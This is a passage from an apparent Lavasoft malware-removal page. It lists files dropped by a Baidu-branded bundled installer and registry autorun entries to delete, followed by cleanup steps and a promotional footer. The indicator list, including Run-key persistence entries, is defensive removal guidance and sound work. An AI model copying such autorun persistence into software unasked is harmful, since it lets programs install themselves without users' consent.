    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginConfig.db (62035 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeConfig.dat (497 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMSetting.rdb (2392 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDLogicUtils.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (13584 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\systemfile.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\dl.dll (65930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUserCenter.dll (9320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDriverFixer.dll (16368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\WebSafe.dll (33455 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\LOG (4 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs (96 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\902.dat (4 bytes)
    %WinDir%\repair (4 bytes)
    %Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
    %Program Files%\WIRESHARK (192 bytes)
    %WinDir%\WinSxS (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (632 bytes)
    %WinDir%\$hf_mig$ (96 bytes)
    %WinDir%\WinSxS\Manifests (1444 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (12074 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\LOG (4 bytes)
    %WinDir%\Help (248 bytes)
    %WinDir%\ime (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\LOG (4 bytes)
    %WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
    %Documents and Settings%\All Users\Documents\My Music (4 bytes)
    C:\$Directory (1388 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (102 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319 (1440 bytes)
    %WinDir%\Microsoft.NET\Framework\V2.0.50727 (1444 bytes)
    %Program Files%\COMMON FILES (4 bytes)
    %System%\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} (4 bytes)
    %WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (48 bytes)
    %Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
    %WinDir%\pchealth\helpctr (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (1040 bytes)
    %Program Files%\Adobe\Reader 9.0 (4 bytes)
    %System%\wbem\Logs\wbemcore.log (576 bytes)
    C:\totalcmd (4 bytes)
    %System%\CatRoot2 (96 bytes)
    %System%\wbem\Repository\FS\INDEX.BTR (608 bytes)
    %Program Files%\Common Files\VMware\Drivers (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\LOG (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (17531 bytes)
    %WinDir%\MICROSOFT.NET (4 bytes)
    %Program Files%\Adobe\Reader 9.0\Reader (192 bytes)
    %WinDir%\assembly (4 bytes)
    %Documents and Settings%\Default User (56 bytes)
    %System%\oobe (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (4 bytes)
    %Documents and Settings%\LocalService (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (3779 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30803.exe (4443178 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\test[1].txt (130 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (130 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe (4700638 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Program Files%\baidu\is-39O9G.tmp (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-CCSRF.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Program Files%\baidu\unins000.dat (932 bytes)
    %Program Files%\baidu\is-RG24O.tmp (25913 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
    %Program Files%\baidu\BindEx.ini (65 bytes)
    %Documents and Settings%\All Users\Desktop\百度卫士-软件管理.lnk (866 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\百度卫士\百度卫士-软件管理.lnk (878 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\SWManager\百度卫士-软件管理.lnk (882 bytes)
    %System%\config\software (3256 bytes)
    %System%\config\SOFTWARE.LOG (4483 bytes)
    %System%\drivers\BDEnhanceBoost.sys (61 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\MANIFEST-000002 (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
    %System%\drivers\BDMWrench.sys (1882 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db (145 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "baidu" = "%Program Files%\baidu\BindEx.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BaiduAnTray.exe -stmd=3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "baidusdTray" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe -stmd=3"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 5 (1 vote)


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now